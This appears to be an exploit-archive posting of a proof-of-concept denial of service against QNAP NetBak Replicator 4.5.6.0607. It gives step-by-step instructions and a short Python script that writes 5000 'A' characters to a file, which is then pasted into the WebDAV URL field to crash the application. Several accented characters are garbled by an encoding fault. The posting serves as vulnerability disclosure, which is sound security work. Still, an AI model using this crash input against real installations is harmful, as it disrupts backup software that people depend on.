QNAP NetBak Replicator 4.5.6.0607 Denial Of Service

QNAP NetBak Replicator version 4.5.6.0607 suffers from a denial of service vulnerability.


MD5 | dd21a451b87bc684ca0b0b7a24df1900

# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)
# Date: 2018-10-29
# Exploit Author: Yair RodrAguez Aparicio
# Vendor Homepage: https://www.qnap.com/en/
# Software Link: https://www.qnap.com/en/download
# Version: 4.5.6.0607
# Tested on: Windows XP Profesional EspaA+-ol SP3 x86

# Steps to Produce the Crash:
# 1.- Run python code : python qnap.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open NetBak Replicator.exe
# 4.- click on RestauraciA3n InstantA!nea
# 5.- Seleccione Origen -> "Ubicacion de red"
# 6.- click on "DirecciA3n URL WebDAV"
# 7.- Paste ClipBoard on "DirecciA3n URL WebDAV"
# 8.- Click "Aceptar".
# 9.- Crashed!



buffer = "\x41" * 5000
f = open("text.txt", "w")
f.write(buffer)
f.close()


Related Posts